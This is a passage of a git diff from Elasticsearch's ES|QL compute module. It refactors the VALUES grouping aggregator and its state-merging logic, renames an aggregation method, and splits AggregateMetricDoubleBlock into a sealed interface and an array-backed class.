a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunction.java @@ -105,13 +105,13 @@ default void add(int positionOffset, IntBlock groupIds) { } /** - * Prepare to process a single page of input. + * Prepare to process a single page of raw input. *

* This should load the input {@link Block}s and check their types and * select an optimal path and return that path as an {@link AddInput}. *

*/ - AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page); // TODO allow returning null to opt out of the callback loop + AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page); // TODO allow returning null to opt out of the callback loop /** * Call this to signal to the aggregation that the {@code selected} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ToPartialGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ToPartialGroupingAggregatorFunction.java index e0087a0ad2340..adcee9462a0ee 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ToPartialGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ToPartialGroupingAggregatorFunction.java @@ -55,8 +55,8 @@ public ToPartialGroupingAggregatorFunction(GroupingAggregatorFunction delegate, } @Override - public AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page) { - return delegate.prepareProcessPage(seenGroupIds, page); + public AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { + return delegate.prepareProcessRawInputPage(seenGroupIds, page); } @Override diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregators.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregators.java index 78a083b8daac7..4a2fa0923abe4 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregators.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/ValuesBytesRefAggregators.java @@ -55,7 +55,7 @@ public void add(int positionOffset, IntArrayBlock groupIds) { int valuesStart = ordinalIds.getFirstValueIndex(groupPosition + positionOffset); int valuesEnd = valuesStart + ordinalIds.getValueCount(groupPosition + positionOffset); for (int v = valuesStart; v < valuesEnd; v++) { - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(v))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(v))); } } } @@ -77,7 +77,7 @@ public void add(int positionOffset, IntBigArrayBlock groupIds) { int valuesStart = ordinalIds.getFirstValueIndex(groupPosition + positionOffset); int valuesEnd = valuesStart + ordinalIds.getValueCount(groupPosition + positionOffset); for (int v = valuesStart; v < valuesEnd; v++) { - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(v))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(v))); } } } @@ -93,7 +93,7 @@ public void add(int positionOffset, IntVector groupIds) { int valuesStart = ordinalIds.getFirstValueIndex(groupPosition + positionOffset); int valuesEnd = valuesStart + ordinalIds.getValueCount(groupPosition + positionOffset); for (int v = valuesStart; v < valuesEnd; v++) { - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(v))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(v))); } } } @@ -135,7 +135,7 @@ public void add(int positionOffset, IntArrayBlock groupIds) { int groupEnd = groupStart + groupIds.getValueCount(groupPosition); for (int g = groupStart; g < groupEnd; g++) { int groupId = groupIds.getInt(g); - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); } } } @@ -150,7 +150,7 @@ public void add(int positionOffset, IntBigArrayBlock groupIds) { int groupEnd = groupStart + groupIds.getValueCount(groupPosition); for (int g = groupStart; g < groupEnd; g++) { int groupId = groupIds.getInt(g); - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); } } } @@ -159,7 +159,7 @@ public void add(int positionOffset, IntBigArrayBlock groupIds) { public void add(int positionOffset, IntVector groupIds) { for (int groupPosition = 0; groupPosition < groupIds.getPositionCount(); groupPosition++) { int groupId = groupIds.getInt(groupPosition); - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/X-ValuesAggregator.java.st b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/X-ValuesAggregator.java.st index 67f32fc4a4d4e..fa8ffecea052d 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/X-ValuesAggregator.java.st +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/X-ValuesAggregator.java.st @@ -43,12 +43,9 @@ $if(BytesRef)$ import org.elasticsearch.compute.data.OrdinalBytesRefBlock; $endif$ import org.elasticsearch.compute.operator.DriverContext; -$if(BytesRef)$ +import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; -$else$ - -$endif$ /** * Aggregates field values for $type$. * This class is generated. Edit @{code X-ValuesAggregator.java.st} instead @@ -90,8 +87,8 @@ $endif$ return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } $if(BytesRef)$ @@ -113,25 +110,7 @@ $if(BytesRef)$ $endif$ public static void combine(GroupingState state, int groupId, $type$ v) { -$if(long)$ - state.values.add(groupId, v); -$elseif(double)$ - state.values.add(groupId, Double.doubleToLongBits(v)); -$elseif(BytesRef)$ - state.values.add(groupId, BlockHash.hashOrdToGroup(state.bytes.add(v))); -$elseif(int)$ - /* - * Encode the groupId and value into a single long - - * the top 32 bits for the group, the bottom 32 for the value. - */ - state.values.add((((long) groupId) << Integer.SIZE) | (v & 0xFFFFFFFFL)); -$elseif(float)$ - /* - * Encode the groupId and value into a single long - - * the top 32 bits for the group, the bottom 32 for the value. - */ - state.values.add((((long) groupId) << Float.SIZE) | (Float.floatToIntBits(v) & 0xFFFFFFFFL)); -$endif$ + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, $Type$Block values, int valuesPosition) { @@ -142,37 +121,27 @@ $endif$ int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { $if(BytesRef)$ - combine(state, groupId, values.getBytesRef(i, scratch)); + state.addValue(groupId, values.getBytesRef(i, scratch)); $else$ - combine(state, groupId, values.get$Type$(i)); + state.addValue(groupId, values.get$Type$(i)); $endif$ } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; $if(BytesRef)$ - BytesRef scratch = new BytesRef(); -$endif$ - for (int id = 0; id < state.values.size(); id++) { -$if(long||BytesRef)$ - if (state.values.getKey1(id) == statePosition) { - long value = state.values.getKey2(id); -$elseif(double)$ - if (state.values.getKey1(id) == statePosition) { - double value = Double.longBitsToDouble(state.values.getKey2(id)); -$elseif(int)$ - long both = state.values.get(id); - int group = (int) (both >>> Integer.SIZE); - if (group == statePosition) { - int value = (int) both; -$elseif(float)$ - long both = state.values.get(id); - int group = (int) (both >>> Float.SIZE); - if (group == statePosition) { - float value = Float.intBitsToFloat((int) both); + current.addValueOrdinal(currentGroupId, id); +$else$ + current.addValue(currentGroupId, state.getValue(id)); $endif$ - combine(current, currentGroupId, $if(BytesRef)$state.bytes.get(value, scratch)$else$value$endif$); - } } } @@ -247,6 +216,24 @@ $endif$ } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. +$if(BytesRef)$ + * If built from {@link GroupingState#sortedForOrdinalMerging(GroupingState)}, + * these are ordinals referring to the {@link GroupingState#bytes} in the target state. +$endif$ + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -255,26 +242,31 @@ $endif$ * collector operation. But at least it's fairly simple. */ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; $if(long||double)$ private final LongLongHash values; $elseif(BytesRef)$ - final LongLongHash values; + private final LongLongHash values; BytesRefHash bytes; $elseif(int||float)$ private final LongHash values; $endif$ - private GroupingState(BigArrays bigArrays) { + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); $if(long||double)$ - values = new LongLongHash(1, bigArrays); + values = new LongLongHash(1, driverContext.bigArrays()); $elseif(BytesRef)$ LongLongHash _values = null; BytesRefHash _bytes = null; try { - _values = new LongLongHash(1, bigArrays); - _bytes = new BytesRefHash(1, bigArrays); + _values = new LongLongHash(1, driverContext.bigArrays()); + _bytes = new BytesRefHash(1, driverContext.bigArrays()); values = _values; bytes = _bytes; @@ -285,7 +277,7 @@ $elseif(BytesRef)$ Releasables.closeExpectNoException(_values, _bytes); } $elseif(int||float)$ - values = new LongHash(1, bigArrays); + values = new LongHash(1, driverContext.bigArrays()); $endif$ } @@ -294,6 +286,36 @@ $endif$ blocks[offset] = toBlock(driverContext.blockFactory(), selected); } +$if(BytesRef)$ + void addValueOrdinal(int groupId, long valueOrdinal) { + values.add(groupId, valueOrdinal); + maxGroupId = Math.max(maxGroupId, groupId); + } + +$endif$ + void addValue(int groupId, $type$ v) { +$if(long)$ + values.add(groupId, v); +$elseif(double)$ + values.add(groupId, Double.doubleToLongBits(v)); +$elseif(BytesRef)$ + values.add(groupId, BlockHash.hashOrdToGroup(bytes.add(v))); +$elseif(int)$ + /* + * Encode the groupId and value into a single long - + * the top 32 bits for the group, the bottom 32 for the value. + */ + values.add((((long) groupId) << Integer.SIZE) | (v & 0xFFFFFFFFL)); +$elseif(float)$ + /* + * Encode the groupId and value into a single long - + * the top 32 bits for the group, the bottom 32 for the value. + */ + values.add((((long) groupId) << Float.SIZE) | (Float.floatToIntBits(v) & 0xFFFFFFFFL)); +$endif$ + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -303,8 +325,23 @@ $endif$ return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { +$if(BytesRef)$ + if (OrdinalBytesRefBlock.isDense(selected.getPositionCount(), Math.toIntExact(values.size()))) { + return buildOrdinalOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } else { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } +$else$ + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); +$endif$ + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. Count @@ -379,28 +416,54 @@ $endif$ idsSize = adjust; int[] ids = new int[total]; for (int id = 0; id < values.size(); id++) { -$if(long||BytesRef||double)$ + $if(long||BytesRef||double)$ int group = (int) values.getKey1(id); -$elseif(float||int)$ + $elseif(float||int)$ long both = values.get(id); int group = (int) (both >>> Float.SIZE); -$endif$ + $endif$ if (group < selectedCounts.length && selectedCounts[group] >= 0) { ids[selectedCounts[group]++] = id; } } -$if(BytesRef)$ - if (OrdinalBytesRefBlock.isDense(selected.getPositionCount(), Math.toIntExact(values.size()))) { - return buildOrdinalOutputBlock(blockFactory, selected, selectedCounts, ids); - } else { - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; + } finally { + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); } -$else$ - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + } + } + + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); +$if(BytesRef)$ + // hash all the bytes to the destination to avoid hashing them multiple times + BytesRef scratch = new BytesRef(); + final int totalValue = Math.toIntExact(bytes.size()); + blockFactory.adjustBreaker((long) totalValue * Integer.BYTES); + try { + final int[] mappedIds = new int[totalValue]; + for (int i = 0; i < totalValue; i++) { + var v = bytes.get(i, scratch); + mappedIds[i] = Math.toIntExact(BlockHash.hashOrdToGroup(other.bytes.add(v))); + } + // no longer need the bytes + bytes.close(); + bytes = null; + for (int i = 0; i < sortedForOrdinalMerging.ids.length; i++) { + sortedForOrdinalMerging.ids[i] = mappedIds[Math.toIntExact(values.getKey2(sortedForOrdinalMerging.ids[i]))]; + } + } finally { + blockFactory.adjustBreaker(-(long) totalValue * Integer.BYTES); + } $endif$ - } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } } + return sortedForOrdinalMerging; } Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { @@ -418,11 +481,11 @@ $endif$ int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]$if(BytesRef)$, scratch$endif$); + case 1 -> builder.append$Type$(getValue(ids[start]$if(BytesRef)$, scratch$endif$)); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i]$if(BytesRef)$, scratch$endif$); + builder.append$Type$(getValue(ids[i]$if(BytesRef)$, scratch$endif$)); } builder.endPositionEntry(); } @@ -470,29 +533,24 @@ $if(BytesRef)$ } } } +$endif$ - private void append($Type$Block.Builder builder, int id, BytesRef scratch) { - BytesRef value = bytes.get(values.getKey2(id), scratch); - builder.appendBytesRef(value); - } - -$else$ - private void append($Type$Block.Builder builder, int id) { -$if(long)$ - long value = values.getKey2(id); + $type$ getValue(int valueId$if(BytesRef)$, BytesRef scratch$endif$) { +$if(BytesRef)$ + return bytes.get(values.getKey2(valueId), scratch); +$elseif(long)$ + return values.getKey2(valueId); $elseif(double)$ - double value = Double.longBitsToDouble(values.getKey2(id)); + return Double.longBitsToDouble(values.getKey2(valueId)); $elseif(float)$ - long both = values.get(id); - float value = Float.intBitsToFloat((int) both); + long both = values.get(valueId); + return Float.intBitsToFloat((int) both); $elseif(int)$ - long both = values.get(id); - int value = (int) both; + long both = values.get(valueId); + return (int) both; $endif$ - builder.append$Type$(value); } -$endif$ @Override public void enableGroupIdTracking(SeenGroupIds seen) { // we figure out seen values from nulls on the values block @@ -501,9 +559,9 @@ $endif$ @Override public void close() { $if(BytesRef)$ - Releasables.closeExpectNoException(values, bytes); + Releasables.closeExpectNoException(values, bytes, sortedForOrdinalMerging); $else$ - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); $endif$ } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/blockhash/BytesRef2BlockHash.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/blockhash/BytesRef2BlockHash.java index ff25aa1381004..963fd1a3a870f 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/blockhash/BytesRef2BlockHash.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/blockhash/BytesRef2BlockHash.java @@ -145,7 +145,9 @@ public Block[] getKeys() { try { try (BytesRefBlock.Builder b1 = blockFactory.newBytesRefBlockBuilder(positions)) { for (int i = 0; i < positions; i++) { - int k1 = (int) (finalHash.get(i) & 0xffffL); + int k1 = (int) (finalHash.get(i) & 0xffffffffL); + // k1 is always positive, it's how hash values are generated, see BytesRefBlockHash. + // For now, we only manage at most 2^31 hash entries if (k1 == 0) { b1.appendNull(); } else { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleArrayBlock.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleArrayBlock.java new file mode 100644 index 0000000000000..b2d5ee0b710d5 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleArrayBlock.java @@ -0,0 +1,292 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.data; + +import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.common.unit.ByteSizeValue; +import org.elasticsearch.core.ReleasableIterator; +import org.elasticsearch.core.Releasables; + +import java.io.IOException; +import java.util.List; +import java.util.stream.Stream; + +public final class AggregateMetricDoubleArrayBlock extends AbstractNonThreadSafeRefCounted implements AggregateMetricDoubleBlock { + private final DoubleBlock minBlock; + private final DoubleBlock maxBlock; + private final DoubleBlock sumBlock; + private final IntBlock countBlock; + private final int positionCount; + + public AggregateMetricDoubleArrayBlock(DoubleBlock minBlock, DoubleBlock maxBlock, DoubleBlock sumBlock, IntBlock countBlock) { + this.minBlock = minBlock; + this.maxBlock = maxBlock; + this.sumBlock = sumBlock; + this.countBlock = countBlock; + this.positionCount = minBlock.getPositionCount(); + for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + if (b.getPositionCount() != positionCount) { + assert false : "expected positionCount=" + positionCount + " but was " + b; + throw new IllegalArgumentException("expected positionCount=" + positionCount + " but was " + b); + } + if (b.isReleased()) { + assert false : "can't build aggregate_metric_double block out of released blocks but [" + b + "] was released"; + throw new IllegalArgumentException( + "can't build aggregate_metric_double block out of released blocks but [" + b + "] was released" + ); + } + } + } + + public static AggregateMetricDoubleArrayBlock fromCompositeBlock(CompositeBlock block) { + assert block.getBlockCount() == 4 + : "Can't make AggregateMetricDoubleBlock out of CompositeBlock with " + block.getBlockCount() + " blocks"; + DoubleBlock min = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()); + DoubleBlock max = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()); + DoubleBlock sum = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()); + IntBlock count = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()); + return new AggregateMetricDoubleArrayBlock(min, max, sum, count); + } + + public CompositeBlock asCompositeBlock() { + final Block[] blocks = new Block[4]; + blocks[AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()] = minBlock; + blocks[AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()] = maxBlock; + blocks[AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()] = sumBlock; + blocks[AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()] = countBlock; + return new CompositeBlock(blocks); + } + + @Override + protected void closeInternal() { + Releasables.close(minBlock, maxBlock, sumBlock, countBlock); + } + + @Override + public Vector asVector() { + return null; + } + + @Override + public int getTotalValueCount() { + int totalValueCount = 0; + for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + totalValueCount += b.getTotalValueCount(); + } + return totalValueCount; + } + + @Override + public int getPositionCount() { + return positionCount; + } + + @Override + public int getFirstValueIndex(int position) { + return minBlock.getFirstValueIndex(position); + } + + @Override + public int getValueCount(int position) { + int max = 0; + for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + max = Math.max(max, b.getValueCount(position)); + } + return max; + } + + @Override + public ElementType elementType() { + return ElementType.AGGREGATE_METRIC_DOUBLE; + } + + @Override + public BlockFactory blockFactory() { + return minBlock.blockFactory(); + } + + @Override + public void allowPassingToDifferentDriver() { + for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + block.allowPassingToDifferentDriver(); + } + } + + @Override + public boolean isNull(int position) { + for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + if (block.isNull(position) == false) { + return false; + } + } + return true; + } + + @Override + public boolean mayHaveNulls() { + return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::mayHaveNulls); + } + + @Override + public boolean areAllValuesNull() { + return Stream.of(minBlock, maxBlock, sumBlock, countBlock).allMatch(Block::areAllValuesNull); + } + + @Override + public boolean mayHaveMultivaluedFields() { + return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::mayHaveMultivaluedFields); + } + + @Override + public boolean doesHaveMultivaluedFields() { + if (Stream.of(minBlock, maxBlock, sumBlock, countBlock).noneMatch(Block::mayHaveMultivaluedFields)) { + return false; + } + return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::doesHaveMultivaluedFields); + } + + @Override + public AggregateMetricDoubleBlock filter(int... positions) { + AggregateMetricDoubleArrayBlock result = null; + DoubleBlock newMinBlock = null; + DoubleBlock newMaxBlock = null; + DoubleBlock newSumBlock = null; + IntBlock newCountBlock = null; + try { + newMinBlock = minBlock.filter(positions); + newMaxBlock = maxBlock.filter(positions); + newSumBlock = sumBlock.filter(positions); + newCountBlock = countBlock.filter(positions); + result = new AggregateMetricDoubleArrayBlock(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + return result; + } finally { + if (result == null) { + Releasables.close(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + } + } + } + + @Override + public AggregateMetricDoubleBlock keepMask(BooleanVector mask) { + AggregateMetricDoubleArrayBlock result = null; + DoubleBlock newMinBlock = null; + DoubleBlock newMaxBlock = null; + DoubleBlock newSumBlock = null; + IntBlock newCountBlock = null; + try { + newMinBlock = minBlock.keepMask(mask); + newMaxBlock = maxBlock.keepMask(mask); + newSumBlock = sumBlock.keepMask(mask); + newCountBlock = countBlock.keepMask(mask); + result = new AggregateMetricDoubleArrayBlock(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + return result; + } finally { + if (result == null) { + Releasables.close(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + } + } + } + + @Override + public ReleasableIterator lookup(IntBlock positions, ByteSizeValue targetBlockSize) { + // TODO: support + throw new UnsupportedOperationException("can't lookup values from AggregateMetricDoubleBlock"); + } + + @Override + public MvOrdering mvOrdering() { + // TODO: determine based on sub-blocks + return MvOrdering.UNORDERED; + } + + @Override + public AggregateMetricDoubleBlock expand() { + this.incRef(); + return this; + } + + @Override + public void writeTo(StreamOutput out) throws IOException { + for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + block.writeTo(out); + } + } + + public static Block readFrom(StreamInput in) throws IOException { + boolean success = false; + DoubleBlock minBlock = null; + DoubleBlock maxBlock = null; + DoubleBlock sumBlock = null; + IntBlock countBlock = null; + BlockStreamInput blockStreamInput = (BlockStreamInput) in; + try { + minBlock = DoubleBlock.readFrom(blockStreamInput); + maxBlock = DoubleBlock.readFrom(blockStreamInput); + sumBlock = DoubleBlock.readFrom(blockStreamInput); + countBlock = IntBlock.readFrom(blockStreamInput); + AggregateMetricDoubleArrayBlock result = new AggregateMetricDoubleArrayBlock(minBlock, maxBlock, sumBlock, countBlock); + success = true; + return result; + } finally { + if (success == false) { + Releasables.close(minBlock, maxBlock, sumBlock, countBlock); + } + } + } + + @Override + public long ramBytesUsed() { + return minBlock.ramBytesUsed() + maxBlock.ramBytesUsed() + sumBlock.ramBytesUsed() + countBlock.ramBytesUsed(); + } + + @Override + public boolean equals(Object obj) { + if (obj instanceof AggregateMetricDoubleBlock that) { + return AggregateMetricDoubleBlock.equals(this, that); + } + return false; + } + + @Override + public int hashCode() { + return AggregateMetricDoubleBlock.hash(this); + } + + public DoubleBlock minBlock() { + return minBlock; + } + + public DoubleBlock maxBlock() { + return maxBlock; + } + + public DoubleBlock sumBlock() { + return sumBlock; + } + + public IntBlock countBlock() { + return countBlock; + } + + public Block getMetricBlock(int index) { + if (index == AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()) { + return minBlock; + } + if (index == AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()) { + return maxBlock; + } + if (index == AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()) { + return sumBlock; + } + if (index == AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()) { + return countBlock; + } + throw new UnsupportedOperationException("Received an index (" + index + ") outside of range for AggregateMetricDoubleBlock."); + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlock.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlock.java index 600b149b4a6c4..9a2736b16e15c 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlock.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlock.java @@ -7,297 +7,102 @@ package org.elasticsearch.compute.data; -import org.elasticsearch.common.io.stream.StreamInput; -import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.core.ReleasableIterator; -import org.elasticsearch.core.Releasables; -import java.io.IOException; import java.util.List; -import java.util.Objects; -import java.util.stream.Stream; -public final class AggregateMetricDoubleBlock extends AbstractNonThreadSafeRefCounted implements Block { - private final DoubleBlock minBlock; - private final DoubleBlock maxBlock; - private final DoubleBlock sumBlock; - private final IntBlock countBlock; - private final int positionCount; - - public AggregateMetricDoubleBlock(DoubleBlock minBlock, DoubleBlock maxBlock, DoubleBlock sumBlock, IntBlock countBlock) { - this.minBlock = minBlock; - this.maxBlock = maxBlock; - this.sumBlock = sumBlock; - this.countBlock = countBlock; - this.positionCount = minBlock.getPositionCount(); - for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - if (b.getPositionCount() != positionCount) { - assert false : "expected positionCount=" + positionCount + " but was " + b; - throw new IllegalArgumentException("expected positionCount=" + positionCount + " but was " + b); - } - if (b.isReleased()) { - assert false : "can't build aggregate_metric_double block out of released blocks but [" + b + "] was released"; - throw new IllegalArgumentException( - "can't build aggregate_metric_double block out of released blocks but [" + b + "] was released" - ); - } - } - } - - public static AggregateMetricDoubleBlock fromCompositeBlock(CompositeBlock block) { - assert block.getBlockCount() == 4 - : "Can't make AggregateMetricDoubleBlock out of CompositeBlock with " + block.getBlockCount() + " blocks"; - DoubleBlock min = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()); - DoubleBlock max = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()); - DoubleBlock sum = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()); - IntBlock count = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()); - return new AggregateMetricDoubleBlock(min, max, sum, count); - } - - public CompositeBlock asCompositeBlock() { - final Block[] blocks = new Block[4]; - blocks[AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()] = minBlock; - blocks[AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()] = maxBlock; - blocks[AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()] = sumBlock; - blocks[AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()] = countBlock; - return new CompositeBlock(blocks); - } - - @Override - protected void closeInternal() { - Releasables.close(minBlock, maxBlock, sumBlock, countBlock); - } +/** + * Block that stores aggregate_metric_double values. + */ +public sealed interface AggregateMetricDoubleBlock extends Block permits AggregateMetricDoubleArrayBlock, ConstantNullBlock { @Override - public Vector asVector() { - return null; - } + AggregateMetricDoubleBlock filter(int... positions); @Override - public int getTotalValueCount() { - int totalValueCount = 0; - for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - totalValueCount += b.getTotalValueCount(); - } - return totalValueCount; - } + AggregateMetricDoubleBlock keepMask(BooleanVector mask); @Override - public int getPositionCount() { - return positionCount; - } + ReleasableIterator lookup(IntBlock positions, ByteSizeValue targetBlockSize); @Override - public int getFirstValueIndex(int position) { - return minBlock.getFirstValueIndex(position); - } + AggregateMetricDoubleBlock expand(); + /** + * Compares the given object with this block for equality. Returns {@code true} if and only if the + * given object is a AggregateMetricDoubleBlock, and both blocks are + * {@link #equals(AggregateMetricDoubleBlock, AggregateMetricDoubleBlock) equal}. + */ @Override - public int getValueCount(int position) { - int max = 0; - for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - max = Math.max(max, b.getValueCount(position)); - } - return max; - } + boolean equals(Object obj); + /** Returns the hash code of this block, as defined by {@link #hash(AggregateMetricDoubleBlock)}. */ @Override - public ElementType elementType() { - return ElementType.AGGREGATE_METRIC_DOUBLE; - } + int hashCode(); - @Override - public BlockFactory blockFactory() { - return minBlock.blockFactory(); - } - - @Override - public void allowPassingToDifferentDriver() { - for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - block.allowPassingToDifferentDriver(); + /** + * Returns {@code true} if the given blocks are equal to each other, otherwise {@code false}. + * Two blocks are considered equal if they have the same position count, and contain the same + * values 